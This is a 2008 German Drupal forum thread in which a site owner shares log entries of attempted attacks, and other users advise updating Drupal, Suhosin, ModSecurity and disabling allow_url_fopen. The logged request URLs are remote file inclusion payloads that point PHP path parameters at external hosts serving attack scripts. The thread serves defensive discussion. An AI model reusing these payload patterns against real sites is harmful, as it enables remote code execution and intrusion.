Startseite
  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche
Startseite › Forum › Drupalcenter.de › Allgemeines zu Drupal ›

Info zu "Hackversuchen"

Eingetragen von Jim (25)
am 15.10.2008 - 10:58 Uhr in
  • Allgemeines zu Drupal
  • Drupal 5.x oder neuer

Hallo zusammen,

wie ich gerade im Log festgestellt habe versuchen seit ein paar Tagen irgendwelche Trollos meine Webseite zu "hacken". Vielleicht sind die folgenden Infos ja für den ein oder anderen User auch von Interesse. Hier mal die entsprechenden Infos aus dem Log (Seite nicht gefunden) von Drupal (Auszug):

IP: 200.199.75.194
http://meine_Domain//cgi/browser/methodTable.php?cfg[AmfphpPath]=http://www.severo-zapad.ru//i/alb_id.txt?

IP: 200.199.75.194
http://meine_Domain//cgi/browser/methodTable.php?cfg[AmfphpPath]=http://www.severo-zapad.ru//i/alb_id.txt?

IP: 203.22.204.202
http://meine_Domain//cgi/browser/ServiceBrowser.php?_basedir=http://www....?

IP: 62.149.238.228
http://meine_Domain/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/ixan_xdet/safe.txt?

Da bei mir noch die Version 5.7 eingesetzt wird, werd' ich jetzt wohl erstmal auf die aktuelle Version 5.11 updaten, in der Hoffnung das dadurch schon mal wieder etwas mehr Sicherheit vorhanden ist. Ein sperren der IPs (bzw. ganzer IP-Bereiche) per Zugriffsrechte oder htaccess macht wohl keinen Sinn, da diese Trollos über IPs aus Südamerika, Russland, USA usw. kommen.

Falls jemand noch irgendwelche Tipps oder Empfehlungen bzgl. der "Hackversuche" hat, dann immer her damit.

Gruß Jim

‹ Link zu PDF-Datei im Menü? URL Rewrite funktioniert nicht nach Datenbankumzug ›
  • Anmelden oder Registrieren um Kommentare zu schreiben

Das ist ganz normal. Du

Eingetragen von Alexander Langer (3416)
am 15.10.2008 - 11:10 Uhr

Das ist ganz normal. Du würdest dich wundern was am Tag so alles auf einem Server und allen seinen Diensten versucht wird.

Neben der Aktualisierung der Webanwendung kannst du beim Shared Hosting herzlich wenig machen. Als Server-Admin hast du natürlich viel mehr Möglichkeiten Vorsorge zu treffen, um es Hackern so schwierig wie möglich zu machen. Letzten Endes bleibt Sicherheit aber immer relativ.

--
Webseiter

  • Anmelden oder Registrieren um Kommentare zu schreiben

Hallo Alexander, Alexander

Eingetragen von Jim (25)
am 19.10.2008 - 13:45 Uhr

Hallo Alexander,

Alexander Langer schrieb

Das ist ganz normal. Du würdest dich wundern was am Tag so alles auf einem Server und allen seinen Diensten versucht wird.

jo - wem sagst Du das: Ich hab' auch noch einen eigenen Server mit div. Seiten und Foren im Einsatz und auch da ist das immer ein "Hase und Igel Spiel".

Naja - hab' jetzt eben mal das Update auf die Version 5.11 gemacht und hoffe das ich damit etwas mehr an Sicherheit gewonnen habe.

Gruß Jim

  • Anmelden oder Registrieren um Kommentare zu schreiben

Wenn du einen eigenen Server

Eingetragen von Alexander Langer (3416)
am 19.10.2008 - 14:13 Uhr

Wenn du einen eigenen Server hast, kannst du ja PHP mit suhosin Patch einsetzen und den Apache mit ModSecurity erweitern, etc.

--
Webseiter

  • Anmelden oder Registrieren um Kommentare zu schreiben

Alexander Langer

Eingetragen von Jim (25)
am 19.10.2008 - 16:08 Uhr
Alexander Langer schrieb

Wenn du einen eigenen Server hast, kannst du ja PHP mit suhosin Patch einsetzen und den Apache mit ModSecurity erweitern, etc.

Ne - wie Du vorher schon richtig getippt hast läuft die Drupal-Seite, um die's hier geht, auf einem gesharten Server und da kann ich natürlich nichts weiter machen. Ausser ein paar Dinge per php.ini, wie z.B. allow_url_fopen = off

Gruß Jim

  • Anmelden oder Registrieren um Kommentare zu schreiben

Benutzeranmeldung

  • Registrieren
  • Neues Passwort anfordern

Aktive Forenthemen

  • für drupal11 ein Slider Modul
  • [gelöst] W3CSS Paragraphs Views
  • Drupal 11 neu aufsetzen und Bereiche aus 10 importieren
  • Wie erlaubt man neuen Benutzern auf die Resetseite zugreifen zu dürfen.
  • [gelöst] Anzeigeformat Text mit Bild in einem Artikel, Drupal 11
  • Social Media Buttons um Insteragram erweitern
  • Nach Installation der neuesten D10-Version kein Zugriff auf Website
  • Composer nach Umzug
  • [gelöst] Taxonomie Begriffe zeigt nicht alle Nodes an
  • Drupal 11 + Experience Builder (Canvas) + Layout Builder
  • Welche KI verwendet ihr?
  • Update Manger läst sich nicht Installieren
Weiter

Neue Kommentare

  • melde mich mal wieder, da ich
    vor 1 Woche 6 Tagen
  • Hey danke
    vor 2 Wochen 3 Stunden
  • Update: jetzt gibt's ein
    vor 2 Wochen 21 Stunden
  • Hallo, im Prinzip habe ich
    vor 2 Wochen 5 Tagen
  • Da scheint die Terminologie
    vor 2 Wochen 5 Tagen
  • Kannst doch auch alles direkt
    vor 3 Wochen 2 Tagen
  • In der entsprechenden View
    vor 3 Wochen 2 Tagen
  • Dazu müsstest Du vermutlich
    vor 3 Wochen 2 Tagen
  • gelöst
    vor 5 Wochen 6 Tagen
  • Ja natürlich. Dass ist etwas,
    vor 6 Wochen 3 Stunden

Statistik

Beiträge im Forum: 250233
Registrierte User: 20451

Neue User:

  • ByteScrapers
  • Mroppoofpaync
  • 4aficiona2

» Alle User anzeigen

User nach Punkten sortiert:
wla9461
stBorchert6003
quiptime4972
Tobias Bähr4019
bv3924
ronald3857
md3717
Thoor3678
Alexander Langer3416
Exterior2903
» User nach Punkten
Zur Zeit sind 0 User und 15 Gäste online.

Hauptmenü

  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche

Quicklinks I

  • Infos
  • Drupal Showcase
  • Installation
  • Update
  • Forum
  • Team
  • Verhaltensregeln

Quicklinks II

  • Drupal Jobs
  • FAQ
  • Drupal-Kochbuch
  • Best Practice - Drupal Sites - Guidelines
  • Drupal How To's

Quicklinks III

  • Tipps & Tricks
  • Drupal Theme System
  • Theme Handbuch
  • Leitfaden zur Entwicklung von Modulen

RSS & Twitter

  • Drupal Planet deutsch
  • RSS Feed News
  • RSS Feed Planet
  • Twitter Drupalcenter
Drupalcenter Team | Impressum & Datenschutz | Kontakt
Angetrieben von Drupal | Drupal is a registered trademark of Dries Buytaert.
Drupal Initiative - Drupal Association